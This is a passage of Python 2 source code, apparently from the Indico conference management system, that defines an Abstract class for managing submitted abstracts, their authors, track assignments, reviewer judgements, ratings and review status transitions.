This is useful when files are deleted from the abstract form using Javascript, and so it is
the only way to know that they are deleted.
"""
existingKeys = self.getAttachments().keys()
for key in existingKeys:
if not key in keys:
self._deleteFile(key)
def _deleteFile(self, key):
file = self.getAttachments()[key]
file.delete()
del self.getAttachments()[key]
self._notifyModification()
def removeResource(self, res):
"""Necessary because LocalFile.delete (see _deleteFile) is calling this method.
In our case, nothing to do.
"""
pass
def _setOwner( self, owner ):
self._owner = owner
def getOwner( self ):
return self._owner
def _setId( self, id ):
self._id = str( id )
def getId(self):
return self._id
def _setSubmissionDate( self, newDate ):
self._submissionDate = newDate
def setModificationDate(self, dt = None):
if dt:
self._modificationDate = dt
else:
self._modificationDate = nowutc()
def _notifyModification( self, dt=None ):
self.setModificationDate(dt)
self._p_changed = 1
def getModificationDate( self ):
return self._modificationDate
def _setSubmitter( self, av ):
if not av:
raise MaKaCError( _("An abstract must have a submitter"))
if self._submitter:
self.getOwner().unregisterParticipation( self._submitter )
self._submitter.getUser().unlinkTo(self, "submitter")
self._submitter.delete()
self._submitter=Submitter( self, av )
av.linkTo(self, "submitter")
self.getOwner().registerParticipation( self._submitter )
self._notifyModification()
def recoverSubmitter(self, subm):
if not subm:
raise MaKaCError( _("An abstract must have a submitter"))
if self._submitter:
self.getOwner().unregisterParticipation( self._submitter )
self._submitter.delete()
self._submitter = subm
self._submitter.setAbstract(self)
self.getOwner().registerParticipation( self._submitter )
subm.recover()
self._notifyModification()
def setSubmitter( self, av ):
self._setSubmitter(av)
def getSubmitter( self ):
return self._submitter
def isSubmitter( self, av ):
return self.getSubmitter().representsUser( av )
def setTitle(self, title):
self._title = title.strip()
self._notifyModification()
def getTitle(self):
return self._title
def getFields(self):
return self._fields
def removeField(self, field):
if self.getFields().has_key(field):
del self.getFields()[field]
self._notifyModification()
def setField(self, fid, v):
if isinstance(v, AbstractFieldContent):
v = v.value
try:
self.getFields()[fid].value = v
self._notifyModification()
except:
afm = self.getConference().getAbstractMgr().getAbstractFieldsMgr()
f = next(f for f in afm.getFields() if f.getId() == fid)
if f is not None:
self.getFields()[fid] = AbstractFieldContent(f, v)
def getField(self, field):
if self.getFields().has_key(field):
return self.getFields()[field]
else:
return ""
def getSubmissionDate( self ):
try:
if self._submissionDate:
pass
except AttributeError:
self._submissionDate=nowutc()
return self._submissionDate
def getConference( self ):
mgr = self.getOwner()
return mgr.getOwner() if mgr else None
def _newAuthor( self, **data ):
author = Author( self, **data )
author.setId( self._authorGen.newCount() )
self._authors[ author.getId() ] = author
return author
def _removeAuthor(self,part):
if not self.isAuthor(part):
return
part.delete()
del self._authors[part.getId()]
def isAuthor( self, part ):
return self._authors.has_key( part.getId() )
def getAuthorList( self ):
return self._authors.values()
def getAuthorById(self, id):
return self._authors.get(str(id), None)
def clearAuthors( self ):
self.clearPrimaryAuthors()
self.clearCoAuthors()
self._notifyModification()
def newPrimaryAuthor(self,**data):
auth=self._newAuthor(**data)
self._addPrimaryAuthor(auth)
self._notifyModification()
return auth
def isPrimaryAuthor( self, part ):
return part in self._primaryAuthors
def getPrimaryAuthorList( self ):
return self._primaryAuthors
#XXX: I keep it for compatibility but it should be removed
getPrimaryAuthorsList = getPrimaryAuthorList
def getPrimaryAuthorEmailList(self, lower=False):
emailList = []
for pAuthor in self.getPrimaryAuthorList():
emailList.append(pAuthor.getEmail().lower() if lower else pAuthor.getEmail())
return emailList
def clearPrimaryAuthors(self):
while len(self._primaryAuthors)>0:
self._removePrimaryAuthor(self._primaryAuthors[0])
self._notifyModification()
def _addPrimaryAuthor( self, part ):
if not self.isAuthor( part ):
raise MaKaCError( _("The participation you want to set as primary author is not an author of the abstract"))
if part in self._primaryAuthors:
return
self._primaryAuthors.append( part )
self.getOwner().indexAuthor(part)
def _removePrimaryAuthor(self,part):
if not self.isPrimaryAuthor(part):
return
if self.isSpeaker(part):
self.removeSpeaker(part)
self.getOwner().unindexAuthor(part)
self._primaryAuthors.remove(part)
self._removeAuthor(part)
def recoverPrimaryAuthor(self, auth):
self._authors[ auth.getId() ] = auth
auth.setAbstract(self)
self._addPrimaryAuthor(auth)
auth.recover()
self._notifyModification()
def newCoAuthor(self,**data):
auth=self._newAuthor(**data)
self._addCoAuthor(auth)
self._notifyModification()
return auth
def _comp_CoAuthors(self):
try:
if self._coAuthors!=None:
return
except AttributeError:
self._coAuthors=PersistentList()
for auth in self._authors.values():
if not self.isPrimaryAuthor(auth):
self._addCoAuthor(auth)
def isCoAuthor( self, part ):
self._comp_CoAuthors()
return part in self._coAuthors
def getCoAuthorList( self ):
self._comp_CoAuthors()
return self._coAuthors
def getCoAuthorEmailList(self, lower=False):
emailList = []
for coAuthor in self.getCoAuthorList():
emailList.append(coAuthor.getEmail().lower() if lower else coAuthor.getEmail())
return emailList
def clearCoAuthors(self):
while len(self._coAuthors)>0:
self._removeCoAuthor(self._coAuthors[0])
self._notifyModification()
def _addCoAuthor( self, part ):
self._comp_CoAuthors()
if not self.isAuthor( part ):
raise MaKaCError( _("The participation you want to set as primary author is not an author of the abstract"))
if part in self._coAuthors:
return
self._coAuthors.append( part )
def _removeCoAuthor(self,part):
if not self.isCoAuthor(part):
return
if self.isSpeaker(part):
self.removeSpeaker(part)
self._coAuthors.remove(part)
self._removeAuthor(part)
def recoverCoAuthor(self, auth):
self._authors[ auth.getId() ] = auth
auth.setAbstract(self)
self._addCoAuthor(auth)
auth.recover()
self._notifyModification()
def addSpeaker( self, part ):
if not self.isAuthor( part ):
raise MaKaCError( _("The participation you want to set as speaker is not an author of the abstract"))
if part in self._speakers:
return
self._speakers.append( part )
self._notifyModification()
def removeSpeaker(self,part):
if part not in self._speakers:
return
self._speakers.remove(part)
def clearSpeakers( self ):
while len(self.getSpeakerList()) > 0:
self.removeSpeaker(self.getSpeakerList()[0])
self._speakers = PersistentList()
def getSpeakerList( self ):
return self._speakers
def isSpeaker( self, part ):
return part in self._speakers
def setContribType( self, contribType ):
self._contribTypes[0] = contribType
self._notifyModification()
def getContribType( self ):
return self._contribTypes[0]
def _addTrack( self, track ):
"""Adds the specified track to the suggested track list. Any
verification must be done by the caller.
"""
self._tracks[ track.getId() ] = track
track.addAbstract( self )
self._notifyModification()
def addTrack( self, track ):
self._changeTracksImpl()
if not self._tracks.has_key( track.getId() ):
self._addTrack( track )
self.getCurrentStatus().update()
def _removeTrack( self, track ):
"""Removes the specified track from the track list. Any verification
must be done by the caller.
"""
del self._tracks[ track.getId() ]
track.removeAbstract( self )
self._notifyModification()
def removeTrack( self, track ):
if self._tracks.has_key( track.getId() ):
self._removeTrack( track )
self.getCurrentStatus().update()
if isinstance(self.getCurrentStatus(), AbstractStatusAccepted):
self.getCurrentStatus()._setTrack(None)
def _changeTracksImpl( self ):
if self._tracks.__class__ != OOBTree:
oldTrackList = self._tracks
self._tracks = OOBTree()
for track in oldTrackList:
self._addTrack( track )
self.getCurrentStatus().update()
def getTrackList( self ):
self._changeTracksImpl()
return self._tracks.values()
def getAcceptedTrack(self):
status = self.getCurrentStatus()
if status is None:
return None
if isinstance(status, AbstractStatusAccepted):
return status.getTrack()
def hasTrack( self, track ):
self._changeTracksImpl()
return self._tracks.has_key( track.getId() )
def getTrackListSorted( self ):
self._changeTracksImpl()
return self.getConference().sortTrackList( self._tracks.values() )
def clearTracks( self ):
self._changeTracksImpl()
while len(self.getTrackList())>0:
track = self.getTrackList()[0]
self._removeTrack( track )
self.getCurrentStatus().update()
def setTracks( self, trackList ):
"""Set the suggested track classification of the current abstract to
the specified list
"""
#We need to do it in 2 steps otherwise the list over which we are
# iterating gets modified
toBeRemoved = []
toBeAdded = copy( trackList )
for track in self.getTrackList():
if track not in trackList:
toBeRemoved.append( track )
else:
toBeAdded.remove( track )
for track in toBeRemoved:
self._removeTrack( track )
for track in toBeAdded:
self._addTrack( track )
self.getCurrentStatus().update()
def isProposedForTrack( self, track ):
return self._tracks.has_key( track.getId() )
def getNumTracks(self):
return len( self._tracks )
def getLocator(self):
loc = self.getConference().getLocator()
loc["abstractId"] = self.getId()
return loc
def isAllowedToCoordinate(self, av):
"""Tells whether or not the specified user can coordinate any of the
tracks of this abstract
"""
for track in self.getTrackList():
if track.canUserCoordinate(av):
return True
return False
def canAuthorAccess(self, user):
if user is None:
return False
el = self.getCoAuthorEmailList(True)+self.getPrimaryAuthorEmailList(True)
for e in user.getEmails():
if e.lower() in el:
return True
return False
def isAllowedToAccess(self, av):
"""Tells whether or not an avatar can access an abstract independently
of the protection
"""
#any author is allowed to access
#CFA managers are allowed to access
#any user being able to modify is also allowed to access
#any TC is allowed to access
if self.canAuthorAccess(av):
return True
if self.isAllowedToCoordinate(av):
return True
return self.canUserModify(av)
def canAccess(self, aw):
#if the conference is protected, then only allowed AW can access
return self.isAllowedToAccess(aw.getUser())
def canView(self, aw):
#in the future it would be possible to add an access control
#only those users allowed to access are allowed to view
return self.isAllowedToAccess(aw.getUser())
def canModify(self, aw_or_user):
if hasattr(aw_or_user, 'getUser'):
aw_or_user = aw_or_user.getUser()
return self.canUserModify(aw_or_user)
def canUserModify(self, av):
#the submitter can modify
if self.isSubmitter(av):
return True
#??? any CFA manager can modify
#??? any user granted with modification privileges can modify
#conference managers can modify
conf = self.getConference()
return conf.canUserModify(av)
def getModifKey(self):
return ""
def getAccessKey(self):
return ""
def getAccessController(self):
return self.getConference().getAccessController()
def isProtected(self):
return self.getConference().isProtected()
def delete(self):
if self._owner:
self.getOwner().unregisterParticipation(self._submitter)
self._submitter.getUser().unlinkTo(self, "submitter")
self._submitter.delete()
self._submitter = None
self.clearAuthors()
self.clearSpeakers()
self.clearTracks()
owner = self._owner
self._owner = None
owner.removeAbstract(self)
self.setCurrentStatus(AbstractStatusNone(self))
TrashCanManager().add(self)
def recoverFromTrashCan(self):
TrashCanManager().remove(self)
def getCurrentStatus(self):
try:
if self._currentStatus:
pass
except AttributeError, e:
self._currentStatus = AbstractStatusSubmitted(self)
return self._currentStatus
def setCurrentStatus(self, newStatus):
self._currentStatus = newStatus
#If we want to keep a history of status changes we should add here
# the old status to a list
def accept(self, responsible, destTrack, type, comments="", session=None):
"""
"""
self.getCurrentStatus().accept(responsible, destTrack, type, comments)
#add the abstract to the track for which it has been accepted so it
# is visible for it.
if destTrack is not None:
destTrack.addAbstract(self)
#once the abstract is accepted a new contribution under the destination
# track must be created
# ATTENTION: This import is placed here explicitely for solving
# problems with circular imports
from MaKaC.conference import AcceptedContribution
contrib = AcceptedContribution(self)
if session:
contrib.setSession(session)
contrib.setDuration(dur=session.getContribDuration())
else:
contrib.setDuration()
self.getCurrentStatus().setContribution(contrib)
self._setContribution(contrib)
def reject(self, responsible, comments=""):
"""
"""
self.getCurrentStatus().reject(responsible, comments)
def _cmpByDate(self, tj1, tj2):
return cmp(tj1.getDate(), tj2.getDate())
def getTrackJudgementsHistorical(self):
try:
if self._trackJudgementsHistorical:
pass
if type(self._trackJudgementsHistorical) == tuple:
self._trackJudgementsHistorical = {}
except AttributeError:
self._trackJudgementsHistorical = {}
for track in self.getTrackList():
judgement = None
if self.getTrackAcceptances().has_key(track.getId()):
judgement = self.getTrackAcceptances()[track.getId()]
elif self.getTrackRejections().has_key(track.getId()):
judgement = self.getTrackRejections()[track.getId()]
elif self.getTrackReallocations().has_key(track.getId()):
judgement = self.getTrackReallocations()[track.getId()]
self._trackJudgementsHistorical[track.getId()] = [judgement]
self._notifyModification()
return self._trackJudgementsHistorical
def getJudgementHistoryByTrack(self, track):
id = "notrack"
if track is not None:
id = track.getId()
if self.getTrackJudgementsHistorical().has_key(id):
return self.getTrackJudgementsHistorical()[id]
return []
def _addTrackJudgementToHistorical(self, tj):
id = "notrack"
if tj.getTrack() is not None:
id = tj.getTrack().getId()
if self.getTrackJudgementsHistorical().has_key(id):
if tj not in self.getTrackJudgementsHistorical()[id]:
self.getTrackJudgementsHistorical()[id].insert(0, tj)
else:
self.getTrackJudgementsHistorical()[id] = [tj]
self._notifyModification()
def _removeTrackAcceptance( self, track ):
"""
"""
if self.getTrackAcceptances().has_key( track.getId() ):
del self.getTrackAcceptances()[ track.getId() ]
def _addTrackAcceptance( self, judgement ):
"""
"""
self._removeTrackRejection( judgement.getTrack() )
self._removeTrackReallocation( judgement.getTrack() )
self.getTrackAcceptances()[ judgement.getTrack().getId() ] = judgement
self._addTrackJudgementToHistorical(judgement)
def _removeTrackRejection( self, track ):
"""
"""
if self.getTrackRejections().has_key( track.getId() ):
del self.getTrackRejections()[ track.getId() ]
def _addTrackRejection( self, judgement ):
"""
"""
self._removeTrackAcceptance( judgement.getTrack() )
self._removeTrackReallocation( judgement.getTrack() )
self.getTrackRejections()[ judgement.getTrack().getId() ] = judgement
self._addTrackJudgementToHistorical(judgement)
def _removeTrackReallocation( self, track ):
"""
"""
if self.getTrackReallocations().has_key( track.getId() ):
del self.getTrackReallocations()[ track.getId() ]
def _addTrackReallocation( self, judgement ):
"""
"""
self._removeTrackAcceptance( judgement.getTrack() )
self._removeTrackRejection( judgement.getTrack() )
self.getTrackReallocations()[ judgement.getTrack().getId() ] = judgement
self._addTrackJudgementToHistorical(judgement)
def _clearTrackRejections( self ):
while len(self.getTrackRejections().values())>0:
t = self.getTrackRejections().values()[0].getTrack()
self._removeTrackRejection( t )
def _clearTrackAcceptances( self ):
while len(self.getTrackAcceptances().values())>0:
t = self.getTrackAcceptances().values()[0].getTrack()
self._removeTrackAcceptance( t )
def _clearTrackReallocations( self ):
while len(self.getTrackReallocations().values())>0:
t = self.getTrackReallocations().values()[0].getTrack()
self._removeTrackReallocation(t)
def _removePreviousJud(self, responsible, track):
''' Check if there is a previous judgement and remove it '''
toDelete = [] # list of judgements to delete
for jud in self.getJudgementHistoryByTrack(track):
if jud.getResponsible() == responsible:
toDelete.append(jud)
for x in toDelete:
self.getTrackJudgementsHistorical()[track.getId()].remove(x)
def proposeToAccept( self, responsible, track, contribType, comment="", answers=[] ):
"""
"""
# the proposal has to be done for a track
if track is None:
raise MaKaCError( _("You have to choose a track in order to do the proposal. If there are not tracks to select, please change the track assignment of the abstract"))
#We check the track for which the abstract is proposed to be accepted
# is in the current abstract
if not self.isProposedForTrack( track ):
raise MaKaCError( _("Cannot propose to accept an abstract which is not proposed for the specified track"))
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
# Create the new judgement
jud = AbstractAcceptance( track, responsible, contribType, answers )
jud.setComment( comment )
self._addTrackAcceptance( jud )
# Update the rating of the abstract
self.updateRating()
#We trigger the state transition
self.getCurrentStatus().proposeToAccept()
def proposeToReject( self, responsible, track, comment="", answers=[] ):
"""
"""
# the proposal has to be done for a track
if track is None:
raise MaKaCError( _("You have to choose a track in order to do the proposal. If there are not tracks to select, please change the track assignment of the abstract"))
#We check the track for which the abstract is proposed to be accepted
# is in the current abstract
if not self.isProposedForTrack( track ):
raise MaKaCError( _("Cannot propose to reject an abstract which is not proposed for the specified track"))
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
# Create the new judgement
jud = AbstractRejection( track, responsible, answers )
jud.setComment( comment )
self._addTrackRejection( jud )
# Update the rating of the abstract
self.updateRating()
#We trigger the state transition
self.getCurrentStatus().proposeToReject()
def proposeForOtherTracks( self, responsible, track, comment, propTracks, answers=[] ):
"""
"""
#We check the track which proposes to allocate the abstract is in the
# current abstract
if not self.isProposedForTrack( track ):
raise MaKaCError( _("Cannot propose to reallocate an abstract which is not proposed for the specified track"))
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
#We keep the track judgement
jud = AbstractReallocation( track, responsible, propTracks, answers )
jud.setComment( comment )
self._addTrackReallocation( jud )
#We add the proposed tracks to the abstract
for track in propTracks:
self._addTrack( track )
#We trigger the state transition
self.getCurrentStatus().proposeToReallocate()
# Update the rating of the abstract
self.updateRating()
def withdraw(self,resp,comment=""):
"""
"""
self.getCurrentStatus().withdraw(resp,comment)
def recover( self ):
"""Puts a withdrawn abstract back in the list of submitted abstracts.
HAS NOTHING TO DO WITH THE RECOVERY PROCESS...
"""
#we must clear any track judgement
#self._clearTrackAcceptances()
#self._clearTrackRejections()
#self._clearTrackReallocations()
self.getCurrentStatus().recover() #status change
#if succeeded we must reset the submission date
self._setSubmissionDate( nowutc() )
self._notifyModification()
def getTrackJudgement( self, track ):
if not self.getJudgementHistoryByTrack(track):
return None
lastJud = self.getJudgementHistoryByTrack(track)[0]
# check if judgements for specified trak are the same. If not there is a conflict.
if all(jud.__class__ == lastJud.__class__ for jud in self.getJudgementHistoryByTrack(track)):
return lastJud
return AbstractInConflict(track)
def getTrackAcceptances( self ):
try:
if self._trackAcceptances:
pass
except AttributeError, e:
self._trackAcceptances = OOBTree()
return self._trackAcceptances
def getTrackAcceptanceList( self ):
res = []
for trackId in intersection( self._tracks, self.getTrackAcceptances() ):
res.append( self.getTrackAcceptances()[ trackId ] )
return res
def getNumProposedToAccept( self ):
return len( intersection( self._tracks, self.getTrackAcceptances() ) )
def getTrackRejections( self ):
try:
if self._trackRejections:
pass
except AttributeError, e:
self._trackRejections = OOBTree()
return self._trackRejections
def getNumProposedToReject( self ):
return len( intersection( self._tracks, self.getTrackRejections() ) )
def getTrackReallocations( self ):
try:
if self._trackReallocations:
pass
except AttributeError, e:
self._trackReallocations = OOBTree()
return self._trackReallocations
def getNumProposedToReallocate( self ):
return len( intersection( self._tracks, self.getTrackReallocations() ) )
def getNumJudgements( self ):
"""
Returns the number of tracks for which some proposal has been done.
For instance, let's suppose:
Track 1: 2 propose to accept, 3 propose to reject
Track 2: 1 propose to accept
Track 3: None
The result would be 2 (out of 3)
"""
tmp1 = union( self.getTrackAcceptances(), self.getTrackRejections() )
judgements = union( tmp1, self.getTrackReallocations() )
return len( intersection( self._tracks, judgements ) )
def getReallocationTargetedList( self, track ):
#XXX: not optimal
res = []
for r in self.getTrackReallocations().values():
if track in r.getProposedTrackList():
res.append( r )
return res
def getContribution( self ):
try:
if self._contribution:
pass
except AttributeError:
self._contribution = None
status = self.getCurrentStatus()
if isinstance(status,AbstractStatusAccepted) and \
self._contribution is None:
self._contribution=status.getContribution()
return self._contribution
def _setContribution(self,contrib):
self._contribution = contrib
def getIntCommentList(self):
try:
if self._intComments:
pass
except AttributeError:
self._intComments=PersistentList()
return self._intComments
def addIntComment(self,newComment):
try:
if self._intComments:
pass
except AttributeError:
self._intComments=PersistentList()
try:
if self._intCommentsGen:
pass
except AttributeError:
self._intCommentsGen=Counter()
if newComment in self._intComments:
return
id = newComment.getId()
if id == "":
id = self._authorGen.newCount()
newComment.includeInAbstract(self, id)
self._intComments.append(newComment)
def getIntCommentById(self,id):
try:
if self._intComments:
pass
except AttributeError:
self._intComments=PersistentList()
for comment in self._intComments:
if id.strip()==comment.getId():
return comment
return None
def clearIntCommentList(self):
while len(self.getIntCommentList()) > 0:
self.removeIntComment(self.getIntCommentList()[0])
def removeIntComment(self,comment):
try:
if self._intComments:
pass
except AttributeError:
self._intComments=PersistentList()
if comment not in self._intComments:
return
self._intComments.remove(comment)
comment.delete()
def recoverIntComment(self, comment):
self.addIntComment(comment)
comment.recover()
def markAsDuplicated(self,responsible,originalAbstract,comments="", track=None, answers=[]):
"""
"""
self.getCurrentStatus().markAsDuplicated(responsible,originalAbstract,comments)
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
if track is not None:
jud = AbstractMarkedAsDuplicated( track, responsible, originalAbstract, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
else:
for t in self.getTrackList():
jud = AbstractMarkedAsDuplicated( t, responsible, originalAbstract, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
# Update the rating of the abstract
self.updateRating()
def unMarkAsDuplicated(self,responsible,comments="", track=None, answers=[]):
"""
"""
#we must clear any track judgement
self._clearTrackAcceptances()
self._clearTrackRejections()
self._clearTrackReallocations()
#self.getCurrentStatus().recover() #status change
self.getCurrentStatus().unMarkAsDuplicated(responsible,comments)
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
if track is not None:
jud = AbstractUnMarkedAsDuplicated(track, responsible, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
else:
for t in self.getTrackList():
jud = AbstractUnMarkedAsDuplicated( t, responsible, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
# Update the rating of the abstract
self.updateRating()
self._notifyModification()
def mergeInto(self,responsible,targetAbs,mergeAuthors=False,comments=""):
"""
"""
self.getCurrentStatus().mergeInto(responsible,targetAbs,comments)
targetAbs.addMergeFromAbstract(self)
if mergeAuthors:
#for auth in self.getAuthorList():
# newAuth=targetAbs.newAuthor()
# newAuth.setFromAbstractParticipation(auth)
# if self.isPrimaryAuthor(auth):
# targetAbs.addPrimaryAuthor(newAuth)
for auth in self.getPrimaryAuthorList():
newAuth=targetAbs.newPrimaryAuthor()
newAuth.setFromAbstractParticipation(auth)
for auth in self.getCoAuthorList():
newAuth=targetAbs.newCoAuthor()
newAuth.setFromAbstractParticipation(auth)
def notify(self,notificator,responsible):
"""notifies the abstract responsibles with a matching template
"""
tpl=self.getOwner().getNotifTplForAbstract(self)
if not tpl:
return
notificator.notify(self,tpl)
self.getNotificationLog().addEntry(NotifLogEntry(responsible,tpl))
def unMerge(self,responsible,comments=""):
#we must clear any track judgement
self._clearTrackAcceptances()
self._clearTrackRejections()
self._clearTrackReallocations()
self.getCurrentStatus().getTargetAbstract().removeMergeFromAbstract(self)
self.getCurrentStatus().unMerge(responsible,comments)
self._notifyModification()
def getNotificationLog(self):
try:
if self._notifLog:
pass
except AttributeError:
self._notifLog=NotificationLog(self)
return self._notifLog
# Rating methods
def getRating(self):
""" Get the average rating of the abstract """
try:
if self._rating:
pass
except AttributeError:
self._rating = None
return self._rating
def updateRating(self, scale = None):
"""
Update the average rating of the abstract which is calculated with the average of each judgement.
If the scale (tuple with lower,higher) is passed, the judgement are re-adjusted to the new scale.
"""
self._rating = None
# calculate the total valoration
judNum = 0
ratingSum = 0
for track in self.getTrackListSorted():
for jud in self.getJudgementHistoryByTrack(track):
if scale:
# calculate the new values for each judgement
scaleLower, scaleHigher = scale
jud.recalculateJudgementValues(scaleLower, scaleHigher)
if jud.getJudValue() != None: # it means there is a numeric value for the judgement
ratingSum += jud.getJudValue()
judNum += 1
# Calculate the average
if judNum != 0:
self._rating = float(ratingSum) / judNum
def getQuestionsAverage(self):
'''Get the list of questions answered in the reviews for an abstract '''
dTotals = {} # {idQ1: total_value, idQ2: total_value ...}
dTimes = {} # {idQ1: times_answered, idQ2: times_answered}
for track in self.getTrackListSorted():
for jud in self.getJudgementHistoryByTrack(track):
for answer in jud.getAnswers():
# check if the question is in d and sum the answers value or insert in d the new question
if dTotals.has_key(answer.getQuestion().getText()):
dTotals[answer.getQuestion().getText()] += answer.getValue()
dTimes[answer.getQuestion().getText()] += 1
else: # first time
dTotals[answer.getQuestion().getText()] = answer.getValue()
dTimes[answer.getQuestion().getText()] = 1
# get the questions average
questionsAverage = {}
for q, v in dTotals.iteritems():
# insert the element and calculate the average for the value
questionsAverage[q] = float(v)/dTimes[q]
return questionsAverage
def removeAnswersOfQuestion(self, questionId):
''' Remove the answers of the question with questionId value '''
for track in self.getTrackListSorted():
for jud in self.getJudgementHistoryByTrack(track):
jud.removeAnswer(questionId)
def getRatingPerReviewer(self, user, track):
"""
Get the rating of the user for the abstract in the track given.
"""
for jud in self.getJudgementHistoryByTrack(track):
if (jud.getResponsible() == user):
return jud.getJudValue()
def getLastJudgementPerReviewer(self, user, track):
"""
Get the last judgement of the user for the abstract in the track given.
"""
for jud in self.getJudgementHistoryByTrack(track):
if (jud.getResponsible() == user):
return jud
def _getAttachmentsCounter(self):
try:
if self._attachmentsCounter:
pass
except AttributeError:
self._attachmentsCounter = Counter()
return self._attachmentsCounter.newCount()
def setAttachments(self, attachments):
self._attachments = attachments
def getAttachments(self):
try:
if self._attachments:
pass
except AttributeError:
self._attachments = {}
return self._attachments
def getAttachmentById(self, id):
return self.getAttachments().get(id, None)
class AbstractJudgement( Persistent ):
"""This class represents each of the judgements made by a track about a
certain abstract. Each track for which an abstract is proposed can
make a judgement proposing the abstract to be accepted or rejected.
Different track judgements must be kept so the referees who have to
take the final decission can overview different opinions from the
track coordinators.
Together with the judgement some useful information like the date when
it was done and the user who did it will be kept.
"""
def __init__( self, track, responsible, answers ):
self._track = track
self._setResponsible( responsible )
self._date = nowutc()
self._comment = ""
self._answers = answers
self._judValue = self.calculateJudgementAverage() # judgement average value
self._totalJudValue = self.calculateAnswersTotalValue()
def _setResponsible( self, newRes ):
self._responsible = newRes
def getResponsible( self ):
return self._responsible
def getDate( self ):
return self._date
def setDate(self, date):
self._date = date
def getTrack( self ):
return self._track
def setComment( self, newComment ):
self._comment = newComment.strip()
def getComment( self ):
return self._comment
def getAnswers(self):
try:
if self._answers:
pass
except AttributeError:
self._answers = []
return self._answers
def calculateJudgementAverage(self):
'''Calculate the average value of the given answers'''
result = 0
if (len(self.getAnswers()) != 0):
# convert the values into float types
floatList = [ans.getValue() for ans in self._answers]
result = sum(floatList) / float(len(floatList)) # calculate the average
else:
# there are no questions
result = None
return result
def getJudValue(self):
try:
if self._judValue:
pass
except AttributeError:
self._judValue = self.calculateJudgementAverage() # judgement average value
return self._judValue
def getTotalJudValue(self):
try:
if self._totalJudValue:
pass
except AttributeError:
self._totalJudValue = self.calculateAnswersTotalValue()
return self._totalJudValue
def calculateAnswersTotalValue(self):
''' Calculate the sum of all the ratings '''
result = 0
for ans in self.getAnswers():
result += ans.getValue()
return result
def recalculateJudgementValues(self, scaleLower, scaleHigher):
''' Update the values of the judgement. This function is called when the scale is changed.'''
for ans in self.getAnswers():
ans.calculateRatingValue(scaleLower, scaleHigher)
self._judValue = self.calculateJudgementAverage()
self._totalJudValue = self.calculateAnswersTotalValue()
def removeAnswer(self, questionId):
''' Remove the current answers of the questionId '''
for ans in self.getAnswers():
if ans.getQuestion().getId() == questionId:
self._answers.remove(ans)
self._notifyModification()
def _notifyModification(self):
self._p_changed = 1
class AbstractAcceptance( AbstractJudgement ):
def __init__( self, track, responsible, contribType, answers ):
AbstractJudgement.__init__( self, track, responsible, answers )
self._contribType = contribType
def clone(self,track):
aa = AbstractAcceptance(track,self.getResponsible(), self.getContribType(), self.getAnswers())
return aa
def getContribType( self ):
try:
if self._contribType:
pass
except AttributeError, e:
self._contribType = None
return self._contribType
class AbstractRejection( AbstractJudgement ):
def clone(self, track):
arj = AbstractRejection(track,self.getResponsible(), self.getAnswers())
return arj
class AbstractReallocation( AbstractJudgement ):
def __init__( self, track, responsible, propTracks, answers ):
AbstractJudgement.__init__( self, track, responsible, answers )
self._proposedTracks = PersistentList( propTracks )
def clone(self, track):
arl = AbstractReallocation(track, self.getResponsible(), self.getProposedTrackList(), self.getAnswers())
return arl
def getProposedTrackList( self ):
return self._proposedTracks
class AbstractInConflict( AbstractJudgement ):
def __init__( self, track ):
AbstractJudgement.__init__( self, track, None, '' )
def clone(self, track):
aic = AbstractInConflict(track, None, '')
return aic
class AbstractMarkedAsDuplicated( AbstractJudgement ):
def __init__( self, track, responsible, originalAbst, answers ):
AbstractJudgement.__init__( self, track, responsible, answers )
self._originalAbst=originalAbst
def clone(self,track):
amad = AbstractMarkedAsDuplicated(track,self.getResponsible(), self.getOriginalAbstract(), self.getAnswers())
return amad
def getOriginalAbstract(self):
return self._originalAbst
class AbstractUnMarkedAsDuplicated( AbstractJudgement ):
def clone(self,track):
auad = AbstractUnMarkedAsDuplicated(track,self.getResponsible())
return auad
class AbstractStatus( Persistent ):
"""This class represents any of the status in which an abstract can be.
From the moment they are submitted (and therefore created), abstracts
can go throuugh different status each having a different meaning.
As there can be many status, the transitions between them are quite
complex and as the system evolves we could require to add or delete
new status the "Status" pattern is applied. This is the base class.
Apart from giving information about the status of an abstract, this
class is responsible to store information about how the status was
reached (who provoke the transition, when, ...).
"""
_name = ""
def __init__( self, abstract ):
self._setAbstract( abstract )
self._setDate( nowutc() )
def getName(self):
return self._name
def _setAbstract( self, abs ):
self._abstract = abs
def getAbstract( self ):
return self._abstract
def _setDate( self, date ):
self._date = date
def getDate( self ):
return self._date
def accept(self,responsible,destTrack,type,comments=""):
"""
"""
s = AbstractStatusAccepted(self.getAbstract(),responsible,destTrack,type,comments)
self.getAbstract().setCurrentStatus( s )
def reject( self, responsible, comments = "" ):
"""
"""
s = AbstractStatusRejected( self.getAbstract(), responsible, comments )
self.getAbstract().setCurrentStatus( s )
def _getStatusClass( self ):
"""
"""
numAccepts = self._abstract.getNumProposedToAccept() # number of tracks that have at least one proposal to accept
numReallocate = self._abstract.getNumProposedToReallocate() # number of tracks that have at least one proposal to reallocate
numJudgements = self._abstract.getNumJudgements() # number of tracks that have at least one judgement
if numJudgements > 0:
# If at least one track status is in conflict the abstract status is in conflict too.
if any(isinstance(self._abstract.getTrackJudgement(track), AbstractInConflict) for track in self._abstract.getTrackList()):
return AbstractStatusInConflict
numTracks = self._abstract.getNumTracks() # number of tracks that this abstract has assigned
if numTracks == numJudgements: # Do we have judgements for all tracks?
if numReallocate == numTracks:
return AbstractStatusInConflict
elif numAccepts == 1:
return AbstractStatusProposedToAccept
elif numAccepts == 0:
return AbstractStatusProposedToReject
return AbstractStatusInConflict
return AbstractStatusUnderReview
return AbstractStatusSubmitted
def update( self ):
"""
"""
newStatusClass = self._getStatusClass()
if self.__class__ != newStatusClass:
self.getAbstract().setCurrentStatus( newStatusClass( self._abstract ) )
def proposeToAccept( self ):
"""
"""
s = self._getStatusClass()( self._abstract )
self.getAbstract().setCurrentStatus( s )
def proposeToReject( self ):
"""
"""
s = self._getStatusClass()( self._abstract )
self.getAbstract().setCurrentStatus( s )
def proposeToReallocate( self ):
"""
